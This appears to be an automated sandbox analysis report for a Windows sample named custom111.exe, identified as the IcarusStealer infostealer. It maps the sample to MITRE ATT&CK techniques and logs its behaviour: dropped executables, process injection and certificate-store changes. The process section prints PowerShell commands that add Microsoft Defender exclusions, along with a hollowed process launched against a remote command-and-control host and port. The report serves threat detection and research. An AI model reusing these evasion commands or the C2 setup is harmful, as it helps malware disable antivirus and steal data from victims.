Malware Analysis Report

2024-08-06 08:21

Sample ID 240309-2yxh9sdc48
Target custom111.exe
SHA256 13b863f0e32c4e25af5b2e323bddf6ea7f8fde1c3dc53bbc463d5a0e9c666882
Tags
icarusstealer persistence stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

13b863f0e32c4e25af5b2e323bddf6ea7f8fde1c3dc53bbc463d5a0e9c666882

Threat Level: Known bad

The file custom111.exe was found to be: Known bad.

Malicious Activity Summary

icarusstealer persistence stealer

IcarusStealer

Modifies Installed Components in the registry

Loads dropped DLL

Executes dropped EXE

Checks computer location settings

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Suspicious use of SetThreadContext

Drops file in System32 directory

Unsigned PE

Enumerates physical storage devices

Suspicious behavior: GetForegroundWindowSpam

Modifies registry class

Modifies system certificate store

Suspicious behavior: EnumeratesProcesses

Uses Task Scheduler COM API

Suspicious use of FindShellTrayWindow

Suspicious use of AdjustPrivilegeToken

Creates scheduled task(s)

Delays execution with timeout.exe

Suspicious use of SendNotifyMessage

Suspicious use of WriteProcessMemory

MITRE ATT&CK Matrix V13

Initial Access
TA0001
Execution
TA0002
Scheduled Task/Job
T1053
Persistence
TA0003
Boot or Logon Autostart Execution
T1547
Registry Run Keys / Startup Folder
T1547.001
Scheduled Task/Job
T1053
Privilege Escalation
TA0004
Boot or Logon Autostart Execution
T1547
Registry Run Keys / Startup Folder
T1547.001
Scheduled Task/Job
T1053
Defense Evasion
TA0005
Modify Registry
T1112
Subvert Trust Controls
T1553
Install Root Certificate
T1553.004
Credential Access
TA0006
Discovery
TA0007
System Information Discovery
T1082
Query Registry
T1012
Lateral Movement
TA0008
Collection
TA0009
Exfiltration
TA0010
Command and Control
TA0011
Web Service
T1102
Impact
TA0040
Resource Development
TA0042
Reconnaissance
TA0043

Analysis: static1

Detonation Overview

Reported

2024-03-09 23:00

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-03-09 22:59

Reported

2024-03-09 23:02

Platform

win7-20240221-en

Max time kernel

150s

Max time network

124s

Command Line

"C:\Users\Admin\AppData\Local\Temp\custom111.exe"

Signatures

IcarusStealer

stealer icarusstealer

Modifies Installed Components in the registry

persistence
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1650401615-1019878084-3673944445-1000\Software\Microsoft\Active Setup\Installed Components C:\Windows\explorer.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\switched.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tesetey.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Start.exe N/A
N/A N/A C:\Windows\System32\CatRoot\$SXR\$SXR.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\custom111.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\custom111.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\switched.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\switched.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ipinfo.io N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\System32\CatRoot\$SXR\Read.txt C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
File created C:\Windows\System32\CatRoot\$SXR\$SXR.exe C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
File opened for modification C:\Windows\System32\CatRoot\$SXR\$SXR.exe C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
File opened for modification C:\Windows\System32\CatRoot\$SXR\Read.txt C:\Windows\System32\CatRoot\$SXR\$SXR.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2112 set thread context of 2644 N/A C:\Users\Admin\AppData\Local\Temp\tesetey.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1650401615-1019878084-3673944445-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1650401615-1019878084-3673944445-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1650401615-1019878084-3673944445-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1650401615-1019878084-3673944445-1000_Classes\Local Settings C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1650401615-1019878084-3673944445-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell C:\Windows\explorer.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436 C:\Users\Admin\AppData\Local\Temp\tesetey.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde C:\Users\Admin\AppData\Local\Temp\tesetey.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\tesetey.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Start.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Start.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Start.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Start.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Start.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Start.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Start.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Start.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Start.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Start.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Start.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Start.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Start.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Start.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Start.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Start.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Start.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Start.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Start.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Start.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Start.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Start.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Start.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Start.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Start.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Start.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Start.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Start.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Start.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Start.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Start.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Start.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Start.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Start.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Start.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Start.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Start.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Start.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Start.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Start.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Start.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Start.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Start.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Start.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Start.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Start.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Start.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Start.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Start.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Start.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Start.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Start.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Start.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Start.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Start.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Start.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Start.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Start.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\tesetey.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Start.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\CatRoot\$SXR\$SXR.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\CatRoot\$SXR\$SXR.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2360 wrote to memory of 2964 N/A C:\Users\Admin\AppData\Local\Temp\custom111.exe C:\Users\Admin\AppData\Local\Temp\Client.exe
PID 2360 wrote to memory of 2964 N/A C:\Users\Admin\AppData\Local\Temp\custom111.exe C:\Users\Admin\AppData\Local\Temp\Client.exe
PID 2360 wrote to memory of 2964 N/A C:\Users\Admin\AppData\Local\Temp\custom111.exe C:\Users\Admin\AppData\Local\Temp\Client.exe
PID 2360 wrote to memory of 2964 N/A C:\Users\Admin\AppData\Local\Temp\custom111.exe C:\Users\Admin\AppData\Local\Temp\Client.exe
PID 2360 wrote to memory of 2988 N/A C:\Users\Admin\AppData\Local\Temp\custom111.exe C:\Users\Admin\AppData\Local\Temp\switched.exe
PID 2360 wrote to memory of 2988 N/A C:\Users\Admin\AppData\Local\Temp\custom111.exe C:\Users\Admin\AppData\Local\Temp\switched.exe
PID 2360 wrote to memory of 2988 N/A C:\Users\Admin\AppData\Local\Temp\custom111.exe C:\Users\Admin\AppData\Local\Temp\switched.exe
PID 2360 wrote to memory of 2988 N/A C:\Users\Admin\AppData\Local\Temp\custom111.exe C:\Users\Admin\AppData\Local\Temp\switched.exe
PID 2988 wrote to memory of 2704 N/A C:\Users\Admin\AppData\Local\Temp\switched.exe C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe
PID 2988 wrote to memory of 2704 N/A C:\Users\Admin\AppData\Local\Temp\switched.exe C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe
PID 2988 wrote to memory of 2704 N/A C:\Users\Admin\AppData\Local\Temp\switched.exe C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe
PID 2988 wrote to memory of 2704 N/A C:\Users\Admin\AppData\Local\Temp\switched.exe C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe
PID 2988 wrote to memory of 2112 N/A C:\Users\Admin\AppData\Local\Temp\switched.exe C:\Users\Admin\AppData\Local\Temp\tesetey.exe
PID 2988 wrote to memory of 2112 N/A C:\Users\Admin\AppData\Local\Temp\switched.exe C:\Users\Admin\AppData\Local\Temp\tesetey.exe
PID 2988 wrote to memory of 2112 N/A C:\Users\Admin\AppData\Local\Temp\switched.exe C:\Users\Admin\AppData\Local\Temp\tesetey.exe
PID 2988 wrote to memory of 2112 N/A C:\Users\Admin\AppData\Local\Temp\switched.exe C:\Users\Admin\AppData\Local\Temp\tesetey.exe
PID 2704 wrote to memory of 2648 N/A C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe C:\Windows\system32\cmd.exe
PID 2704 wrote to memory of 2648 N/A C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe C:\Windows\system32\cmd.exe
PID 2704 wrote to memory of 2648 N/A C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe C:\Windows\system32\cmd.exe
PID 2648 wrote to memory of 2628 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\certutil.exe
PID 2648 wrote to memory of 2628 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\certutil.exe
PID 2648 wrote to memory of 2628 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\certutil.exe
PID 2648 wrote to memory of 2568 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\find.exe
PID 2648 wrote to memory of 2568 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\find.exe
PID 2648 wrote to memory of 2568 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\find.exe
PID 2648 wrote to memory of 2604 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\find.exe
PID 2648 wrote to memory of 2604 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\find.exe
PID 2648 wrote to memory of 2604 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\find.exe
PID 2112 wrote to memory of 2900 N/A C:\Users\Admin\AppData\Local\Temp\tesetey.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
PID 2112 wrote to memory of 2900 N/A C:\Users\Admin\AppData\Local\Temp\tesetey.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
PID 2112 wrote to memory of 2900 N/A C:\Users\Admin\AppData\Local\Temp\tesetey.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
PID 2112 wrote to memory of 2900 N/A C:\Users\Admin\AppData\Local\Temp\tesetey.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
PID 2900 wrote to memory of 2412 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 2900 wrote to memory of 2412 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 2900 wrote to memory of 2412 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 2900 wrote to memory of 2412 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 2112 wrote to memory of 1572 N/A C:\Users\Admin\AppData\Local\Temp\tesetey.exe C:\Windows\explorer.exe
PID 2112 wrote to memory of 1572 N/A C:\Users\Admin\AppData\Local\Temp\tesetey.exe C:\Windows\explorer.exe
PID 2112 wrote to memory of 1572 N/A C:\Users\Admin\AppData\Local\Temp\tesetey.exe C:\Windows\explorer.exe
PID 2112 wrote to memory of 1572 N/A C:\Users\Admin\AppData\Local\Temp\tesetey.exe C:\Windows\explorer.exe
PID 2112 wrote to memory of 2644 N/A C:\Users\Admin\AppData\Local\Temp\tesetey.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 2112 wrote to memory of 2644 N/A C:\Users\Admin\AppData\Local\Temp\tesetey.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 2112 wrote to memory of 2644 N/A C:\Users\Admin\AppData\Local\Temp\tesetey.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 2112 wrote to memory of 2644 N/A C:\Users\Admin\AppData\Local\Temp\tesetey.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 2112 wrote to memory of 2644 N/A C:\Users\Admin\AppData\Local\Temp\tesetey.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 2112 wrote to memory of 2644 N/A C:\Users\Admin\AppData\Local\Temp\tesetey.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 2112 wrote to memory of 2644 N/A C:\Users\Admin\AppData\Local\Temp\tesetey.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 2112 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\tesetey.exe C:\Windows\SysWOW64\cmd.exe
PID 2112 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\tesetey.exe C:\Windows\SysWOW64\cmd.exe
PID 2112 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\tesetey.exe C:\Windows\SysWOW64\cmd.exe
PID 2112 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\tesetey.exe C:\Windows\SysWOW64\cmd.exe
PID 2112 wrote to memory of 2644 N/A C:\Users\Admin\AppData\Local\Temp\tesetey.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 2112 wrote to memory of 2644 N/A C:\Users\Admin\AppData\Local\Temp\tesetey.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 1572 wrote to memory of 1840 N/A C:\Windows\explorer.exe C:\Windows\system32\ctfmon.exe
PID 1572 wrote to memory of 1840 N/A C:\Windows\explorer.exe C:\Windows\system32\ctfmon.exe
PID 1572 wrote to memory of 1840 N/A C:\Windows\explorer.exe C:\Windows\system32\ctfmon.exe
PID 2668 wrote to memory of 892 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\Start.exe
PID 2668 wrote to memory of 892 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\Start.exe
PID 2668 wrote to memory of 892 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\Start.exe
PID 2668 wrote to memory of 892 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\Start.exe
PID 1572 wrote to memory of 2216 N/A C:\Windows\explorer.exe C:\Windows\system32\ctfmon.exe
PID 1572 wrote to memory of 2216 N/A C:\Windows\explorer.exe C:\Windows\system32\ctfmon.exe
PID 1572 wrote to memory of 2216 N/A C:\Windows\explorer.exe C:\Windows\system32\ctfmon.exe
PID 2644 wrote to memory of 2244 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\SysWOW64\cmd.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\custom111.exe

"C:\Users\Admin\AppData\Local\Temp\custom111.exe"

C:\Users\Admin\AppData\Local\Temp\Client.exe

"C:\Users\Admin\AppData\Local\Temp\Client.exe"

C:\Users\Admin\AppData\Local\Temp\switched.exe

"C:\Users\Admin\AppData\Local\Temp\switched.exe"

C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe

"C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe"

C:\Users\Admin\AppData\Local\Temp\tesetey.exe

"C:\Users\Admin\AppData\Local\Temp\tesetey.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5 | find /i /v "md5" | find /i /v "certutil"

C:\Windows\system32\certutil.exe

certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5

C:\Windows\system32\find.exe

find /i /v "md5"

C:\Windows\system32\find.exe

find /i /v "certutil"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\fkmzrhs3\fkmzrhs3.cmdline"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES4D84.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC21939969A3334B0EBD83DEA3FE3917B8.TMP"

C:\Windows\explorer.exe

"C:\Windows\explorer.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client case-shield.gl.at.ply.gg 26501 vUiuCXqqM

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k start /b C:\Users\Admin\AppData\Local\Temp\Start.exe & exit

C:\Windows\system32\ctfmon.exe

ctfmon.exe

C:\Users\Admin\AppData\Local\Temp\Start.exe

C:\Users\Admin\AppData\Local\Temp\Start.exe

C:\Windows\system32\ctfmon.exe

ctfmon.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe & exit

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe & exit

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe

C:\Windows\SysWOW64\cmd.exe

